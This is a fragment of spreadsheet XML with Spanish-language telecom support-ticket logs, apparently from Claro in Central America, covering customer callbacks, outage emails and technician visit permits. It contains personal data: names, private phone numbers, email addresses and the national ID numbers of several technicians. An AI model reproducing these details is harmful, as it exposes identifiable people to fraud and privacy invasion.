SOLICITO SU AMABLE APOYO PARA TRAMITAR LOS PERMISOS CORRESPONDIENTES HACIA NUESTROS POSIBLES TÉCNICOS QUE LLEGARÁN EL DÍA DE HOY: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FAVOR CONFIRMAR POR ESTE MEDIO CUANDO YA ESTEN LOS PERMISOS,
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>F4567169</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 17:16
PARA: JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ ESCALONA JUAN JOSE &lt;JHESCALO@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100042T ### ::: TICKET CNOC IMBBL003936 ### ::: LINK FLAPPING
*-*-*-*-*</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A TELMEX CON PRUEBAS --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 19 DE MAYO DE 2022 02:15
PARA: CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ ESCALONA JUAN JOSE &lt;JHESCALO@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100042T ### ::: TICKET CNOC IMBBL003936 ### ::: LINK FLAPPING
ESTIMADO SR. CARRILLO
                PERSONAL A CARGO NOS COMENTA QUE DESDE NUESTRO LADO NO SE OBSERVAN EVENTOS Y EL SERVICIO SE MANTIENE ESTABLE.
PING -C 1500 -S 1500 -M 50 -B -VPN INTERNET_GT_DEPTAL 10.105.6.43
  PING 10.105.6.43: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.105.6.43 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/30 MS
PODRÍA APOYARNOS COMPARTIENDO UNA TRAZA PARA PODER REALIZAR MÁS PRUEBAS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>***--- SE R4ECIBE CORREO DE CL INDICANDO QUE SE HAN TENIDO INTERRUPCIONES CADAS 15 MINUTOS Y SOLICITA SE REVISE DE NUEVO Y A MAYOR PROFUNDIDAD --***
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: JUEVES, 19 DE MAYO DE 2022 00:01
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ ESCALONA JUAN JOSE &lt;JHESCALO@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100042T ### ::: TICKET CNOC IMBBL003936 ### ::: LINK FLAPPING
BUEN DIA TEAM
FAVOR DE REVISAR MÁS A FONDO YA QUE HEMOS TENIDO CORTES ENTRE CADA 15 Y 30 MINUTOS.
QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  52 55 5174 5290 REONDEN PERO DEJAN EN ESPERA Y NO RETOMAN LA LLAMADA
-ID 3001262272</t>
  </si>
  <si>
    <t>F4567173</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILFREDO RODRIGUEZ 89634992 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001134046</t>
  </si>
  <si>
    <t>F4567176</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 11:27
PARA: RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; RODRIGUEZ HERNANDEZ LAURA LILIA &lt;RHERNANL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 70019OH: TICKET CNOC IMBBL003938 ::: "CORTES"
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, A LA ESPERA DE VALIDACION:
RE: SOLICITUD DE SOPORTE ::: ID LOCAL 70019OH: TICKET CNOC IMBBL003938 ::: "CORTES"</t>
  </si>
  <si>
    <t>F4567181</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EBER RODRIGUEZ 79224721 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001264225</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EBER RODRIGUEZ 79224721 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001140626</t>
  </si>
  <si>
    <t>SE LE LLAMA AL PR EBER RODRIGUEZ AL 79224721 ID 3001527167 / 3001527330 NO ATIENDE, SE PROCEDE A LLAMAR AL CL ANGEL GUERRA AL 54471236 ID 3001528153  PARA EL SEGUIMIENTO DE SU TICKET Y BRINDA EL CONTACTO PERSONAL 30339421 SE LLAMA ID 3001531517 Y ATIENDE SAUL GRAJEDA DONDE CONFIRMA REINCIDENCIA Y SE CONTACTA CON EL GESTOR A CARGO JHONNSER.ESCOBAR ID 3001536030 INGRESA LA LLAMADA A MIGUEL RODRIGUEZ NO ATIENDE Y LE INGRESA LA LLAMADA A YENSI CALGUA Y SE LE BRINDA LA INFORMACIÓN, CORTA LA LLAMADA.
ID 3001536030
NOMBRE: A: YENSI SUCELY CALGUA MATEO
NÚMERO: 5321
DURACIÓN: 0:02:15
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
FECHA 19/05/2022
HORA: 09:33:29
SE VUELVE A LLAMAR AL 8126 ID 3001541049 INGRESA CON MIGUEL RODRIGUEZ NO ATIENDE Y LE INGRESA  A LUVY SANDOVAL Y COMENTA QUE NO PUEDE ATENDERLO Y VALIDARA ALGÚN GESTOR DISPONIBLE Y COMUNICA AL AXEL LOPEZ, SE DEJA EN LINEA.
ID 3001541049
AXEL SAMUEL LOPEZ ORTIZ
NÚMERO: 5486
DURACIÓN: 0:02:54
DETALLES: 5486
USUARIO DE IC: GUSTAVO.BARAHONA
FECHA: 19/05/2022
HORA 09:37:17</t>
  </si>
  <si>
    <t>F4567183</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO LÓPEZ AL 30310024 NO RESPONDE SE INTENTARA LUEGO **
ID 3001114704
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERNESTO LÓPEZ 30310024 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001142297</t>
  </si>
  <si>
    <t>F4567192</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MARLON PINEDA 75511075 CONFIRMA DATOS DE LA VISITA TECNICA. SE LE INFORMA QUE VISITARAN PRIMERO EL NODO.</t>
  </si>
  <si>
    <t>F4567194</t>
  </si>
  <si>
    <t>MENCIONA QUE YA APLICARON REINICIO Y NO TIENEN PROBLEMA DE ENERGIA, SE SOLICITARON DATOS DE POSIBLE VISITA
SE NOTIFICARA PARA EL SEGUIMIENTO
NOMBRE DEL CLIENTE: LA IGLESIA DE JESUCRISTO DE SUDLA IGLESIA DE JESUCRISTO
UBICACIÓN: SAN MARCOS CARAZO, BARRIO 5 DE JULIO FRENTE AL HOTEL HACIENDA SAN PEDRO
CONTACTO EN SITIO: RICARDO MELENDEZ 78155534
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS
*-*-*-*</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE RICARDO MELENDEZ 78155534 MENCIONA QUE
-ID 3001264684</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE 86700194 /  MARLON MORALES NO RESPONDE, SE INTENTARA LUEGO
-ID 3001144126</t>
  </si>
  <si>
    <t>**SE LLMA A CLIENTE MARLON MORALES AL  86700194 INDICA QUE NO SE ENCUENTRA EN EL SITIO PERO QUE SE LE LLAME AL SEÑOR RICARDO MELENDEZ AL 78155534 **
ID 3001258811
**</t>
  </si>
  <si>
    <t>F4567197</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCO ROSAS 55312227 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001145410</t>
  </si>
  <si>
    <t>F4567198</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO RODRIGUEZ 41752352 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001200352</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO RODRIGUEZ 41752352  MENCIONA QUE NO PUEDE VALIDAR YA QUE SE TIENE INCONVENIENTE CON EL SERVICIO DE LA CENTRAL
-ID 3001146829</t>
  </si>
  <si>
    <t>F4567203</t>
  </si>
  <si>
    <t>CLIENTE JAIME CASTILLO 78543971, CLIENTE JAIME CASTILLO INDICA QUE EL DIA DE AYER PRESENTARON INTEREFENCIA EN LAS LLAMADAS SALIENTES Y ENTRANTES Y COMENTA QUE EL DIA DE HOY EL INCONVENIENTE PERSISTE CON EL GDN 22317500, CLIENTE ESTÁ REINICIANDO SUS EQUIPOS.</t>
  </si>
  <si>
    <t>CLIENTE JAIME CASTILLO 78543971 REINIICA EQUIPO ASMI52 Y REALIZA PRUEBAS DE LLAMADAS ENTRANTES Y SALIENTES, COMENTA QUE EL RUIDO YA NO SE ESTÁ PRESENTANDO. CLIENTE SOLICITA DEJARLO EN OBSERVACIÓN Y VALIDAR AL MEDIO DIA.</t>
  </si>
  <si>
    <t>F4567204</t>
  </si>
  <si>
    <t>CLIENTE JAIME COMENTA QUE YA ESTA EN LLAMADA CON PERSONAL DE CLARO Y PERSONAL DE LA AGENCIA, SE ESTA DANDO SEGUIMIENTO A PRUEBAS CON FALLA F4567203, SE LE INDICA AL CLIENTE QUE SE DARA SEGUIMIENTO CON EL COMPAÑERO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4567206</t>
  </si>
  <si>
    <t>F4567209</t>
  </si>
  <si>
    <t>F4567212</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 12:17
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; RAMOS LERIZTA ILIANA &lt;IRLERIZT@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4685415 ::: TICKET CNOC IMBBL003939 ::: "SERVICIO FUERA"
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4567213</t>
  </si>
  <si>
    <t>F4567214</t>
  </si>
  <si>
    <t>F4567229</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RICARDO FUENTES AL 58599946 INDICA QUE NO HAY ENERGIA EN EL SITIO **
ID 3001092197
**</t>
  </si>
  <si>
    <t>F4567230</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES  AL 45787911 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001095343 - 3001096549
**</t>
  </si>
  <si>
    <t>F4567233</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NIDIA 85102834 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001205958</t>
  </si>
  <si>
    <t>F4567235</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ZELIK RAMIREZ 44895331 MENCIONA QUE NO CUENTAN CON ENERGIA ELECTRICA EN PR
-ID 3001170761</t>
  </si>
  <si>
    <t>F4567236</t>
  </si>
  <si>
    <t>SE LLAMDA A CARLOS SOSA PARA QUE NOS APOYE CON CONFIRMARNOS SI EL ENALCE FUE O SERA DADO DE BAJA PARA PODER PROCEDER CON EL BLOQUEO PERO ME INDICA QUE NO ESTA EN SU OFICINA PARA PODER VALIDAR, ME PIDE QUE SE LLAME TIPO 15:HORAS PARA CONFIRMAR SI NO SE DEBE LLAMAR EL DIA DE MAÑANA DESDE LA 7AM
3001683862
COLA:
NOMBRE: A: 55172816
NÚMERO: 55172816
DURACIÓN: 0:01:41
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55172816
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 19/05/2022 11:01:15</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA QUE SE ENVIE SUPERVISOR, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: JUEVES, 19 DE MAYO DE 2022 10:35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566
ESTIMADO CLIENTE,
SOLICITANDO DE SU APOYO EN ENVIAR SUPERVISOR PARA QUE VALIDE CONEXIONES Y COMO TAL EL EQUIPO DE COBRE ASMI54L YA QUE NO SE TIENE RESPUESTA DEL EQUIPO, TAMBIÉN VALIDAR SI EL EQUIPO TIENE UNA LUZ ROJA EN ALM DE SER ASÍ POSIBLE QUE EL EQUIPO ESTE DAÑADO O QUE SEA CORTE DE COBRE, YA SE PROCEDERÍA A COORDINAR VISITA TÉCNICA PARA PODER SOLUCIONAR EL INCONVENIENTE.
TICKET: F4567236
ID: 47503627T
IDENTIFICADOR DEL CLIENTE:CC_TYT_GT_ATM4566
UBICADO EN: CAJERO 4566_KM 43.4 CALLE PRINCIPAL LOTE 12 ALDEA STA INES DEL MONTE PULCIANO ANTIGUA GUATEMALA SAC
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.  SALUDOS.</t>
  </si>
  <si>
    <t>F4567237</t>
  </si>
  <si>
    <t>SE HABLA CONC LIENTE- COMENTA QUE NO TIENE LLAMADAS SALIENTES. AL LEVANTAR EL TELEFONO NO TIENE TONO, ESTA TOTALMENTE MUERTO, SE LE EXPILCA A CLIENTE QUE A NIVEL DE CLARO TODO OK- CLIENTE INDICA QUE REVISARA A NIVEL INTERNO, PIDE SE LE MARQUE EN 1 HORA 30 PARA CONFIRMAR SI PUDO SOLVENTARLO- ##
3001087755
COLA:
NOMBRE: A: 59229827
NÚMERO: 59229827
DURACIÓN: 0:06:35
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 59229827
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 09:29:00</t>
  </si>
  <si>
    <t>SE HA ENVIA CORREO A CLEINTE. ENE SPERA DE PERMISOS-
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 11:46
PARA: COORDINADORSISTEMAS@CIAG.COM.GT &lt;COORDINADORSISTEMAS@CIAG.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: GDN 25042929 COLEGIO DE INGENIEROS AGRONOMOS
BUEN DÍA ESTIMADO, CON RESPECTO AL E1:
GDN 25042929
COLEGIO DE INGENIEROS AGRONOMOS DE GUATEMALA.-
 11 AVENIDA 12-28 ZONA 2 CIUDAD NUEVA
SOLICITO SU AMABLE APOYO PARA EL TRAMITE DE PERMISOS HACIA NUESTROS POSIBLES TÉCNICOS:
NOMBRE DPI
IVAN ARRAZOLA                                             2319 45019 0101
EDY ESCALANTE                         1981 17108 0101
JOSE ANGEL SANDOVAL               1796 76350 0101
RENE CAMEROS COJON                   2275 16001 0101
HECTOR ROLANDO ALINAN PORON     2360 72870 0208
BYRON CUTZAL                         1689 67987 0101
WILSON WILFREDO ECHEVERRIA     2592 44201 0101
QUEDAMOS PENDIENTE A LA CONFIRMACION DE PERMISOS POR ESTE MEDIO.
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>##EN ESPERA DE PERMISOS POR PARTE DEL CLIENTE ## NO HAY RESPUETA TODAVIA ##</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE HENRY LOPEZ-59229827  NO COMENTA QUE UBBICO EL INCONVENIENTE --- Y SE PROCEDA CON CIERRE ##PROBLEMA A NIVEL LAN ##
3001165723
COLA:
NOMBRE: A: 59229827
NÚMERO: 59229827
DURACIÓN: 0:02:29
ESTADO: CONECTADA
DETALLES: 59229827
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 12:40:55</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY LOPEZ-59229827 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001152892 - 3001153022 - 3001150332</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY LOPEZ-59229827 -- SE TIENE EN LINEA
3001087755
COLA:
NOMBRE: A: 59229827
NÚMERO: 59229827
DURACIÓN: 0:00:37
ESTADO: CONECTADA
DETALLES: 59229827
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 09:22:57</t>
  </si>
  <si>
    <t>F4567241</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO RIVAS 70035180 NO RESPONDE, SE INTENTARA LUEGO **
-ID 300198279
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO RIVAS 70035180 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LAMADA A LAS 14:00 HRS
-ID 3001171693</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO RIVAS 70035180  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE PERO SOLICITA LLAMADA PARA MAÑANA A LAS 10:00 HRS
-ID 3001221368</t>
  </si>
  <si>
    <t>F4567246</t>
  </si>
  <si>
    <t>COMENTA CLIENTE CESAR GARCÍA 76635272 QUE TIENEN EL INCONVENIENTE DE INTERFERENCIA EN LAS LLAMADAS Y A VECES SE QUEDA MUDO, INDICA QUE EL INCONVENIENTE TAMBIÉN SE DIÓ EL DÍA DE AYER. SE LE INDICA QUE SE ESTÁ DANDO SEGUIMIENTO AL CASO. ID:3001092003</t>
  </si>
  <si>
    <t>F4567249</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AGENTE MORALES 79214838 NO RESPONDE,  SUENA DESCONECTADO SE INTENTARA LUEGO**
-ID 3001198959
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AGENTE MORALES 79214838 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001172911 - 3001172769</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AGENTE MORALES 79214838 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001210455</t>
  </si>
  <si>
    <t>F4567251</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ABEL ORTEGA 24119191 EXT 10582 PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001209380</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO  PEREZ  AL 36571084 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001258305
**</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE JULIO  PEREZ 36571084 NO RESPONDE, ENVIA A BUZON  SE INTENTARA LUEGO**
-ID 3001199435
**</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE JULIO  PEREZ 36571084 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001173286</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO  PEREZ 36571084 MENCIONA NUMERO EQUIVOCADO, SE LLAMARA A CENTRAL
-ID 3001208019</t>
  </si>
  <si>
    <t>F4567253</t>
  </si>
  <si>
    <t>SE CREO VLAN EN NODO PERO EN CLIENTE AUN FALTA, SE INTENTO REALIZARLO PERO NO GUARDA CONFIGURCION. SE DEBERA REALIZAR REINICIO EN CTC Y PROBAR NUEVAMENTE.---</t>
  </si>
  <si>
    <t>F4567272</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO SOLICITADO POR CLIENTE ##
 M.ORELLANA@FARMACIASUNO.COM.SV
DE: MARIA ISABEL GODINEZ SAENZ
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 10:25
PARA: M.ORELLANA@FARMACIASUNO.COM.SV &lt;M.ORELLANA@FARMACIASUNO.COM.SV&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: GDN 25252400 FARMACIAS UNO S.A. DE C.V.
 BUEN DÍA ESTIMADO, CON RESPECTO AL E1:
 GDN 25252400
 FARMACIAS UNO S.A. DE C.V.
 ANTIGUO CUSCATLAN Z. IND. PLAN DE LA LAGUNA CALLE CIRCUNVALACION LOTE 15
 LE COMENTO QUE TENEMOS UNA FALLA MASIVA A NIVEL DEL SALVADOR, EL CUAL CONSISTE EN PERDIDA DE AUDIO, VOZ ROBOTIZADA, RUIDO EN LAS LLAMADAS, ESTAMOS TOMANDO LAS ACCIONES CORRECTIVAS NECESARIAS PARA PODER RESTABLECER EL SERVICIO LO MÁS PRONTO POSIBLE.
 MIL DISCULPAS POR LOS INCONVENIENTES.
SALUDOS,</t>
  </si>
  <si>
    <t>F4567287</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAMES GRIJALVA 30319629 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001817662 - 3001819219</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OLIVER 30224426 MENCIONA QUE ESTARA VALIDANDO Y REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 3001821982</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE  OLIVER 30224426 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001872406</t>
  </si>
  <si>
    <t>F4567290</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE YAMILETH LOPEZ 57283333 MENCIONA QUE PERSISTE LA CAIDA PERO SOLICITA SE LLAME AL NUMERO 17034245
-ID 3001174559</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YAMILETH LOPEZ 87034245 MENCIONA QUE PERSISTE EL INCONVENIENTE, CLIENTE NO QUIERE APOYAR CON PRUEBAS, SOLICITA UNA VISITA TECNICA
-ID 3001177028
NOMBRE DEL CLIENTE: EMP NIC DE ACUEDUCTOS Y ALCANTARILLADOSENACAL
UBICACIÓN:BARRIO OLAMA FRENTE EL FARO
CONTACTO EN SITIO: YAMILETH LOPEZ 87034245
HORARIO DE ATENCION: 8:00 - 12:00 Y 13:00 - 17:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YAMILETH LOPEZ 17034245 PERO SUENA DESCONECTADO
-ID 3001176238</t>
  </si>
  <si>
    <t>F4567291</t>
  </si>
  <si>
    <t>SE HALBA CON CLIENTE ||  LUIS FERNANDO RODRIGUEZ || CONFIRMA SERVICIOS YA OPERATIVOS Y ESTABLES, AUTOIRZA CIERRE DE TICKET.
RESULTADO: LLAMADA HECHA
NOMBRE: 41752352
NÚMERO: 41752352
INICIO: HOY, 12:50
FIN: HOY, 12:50
DURACIÓN: 0:15
ID DE LLAMADA: 3001170334</t>
  </si>
  <si>
    <t>F4567295</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OLIVER 30224426 PARA SOLICITAR DATOS DE VISITA
-ID 3001444088
NOMBRE DEL CLIENTE: TERNIUM GUATEMALA S.A.
UBICACIÓN:8 CALLE 14-41 ZONA 4 EL ZARZAL VILLA NUEVA
CONTACTO EN SITIO: OLIVER - 30224426
HORARIO DE ATENCION:8:00 - 17:00 HRS
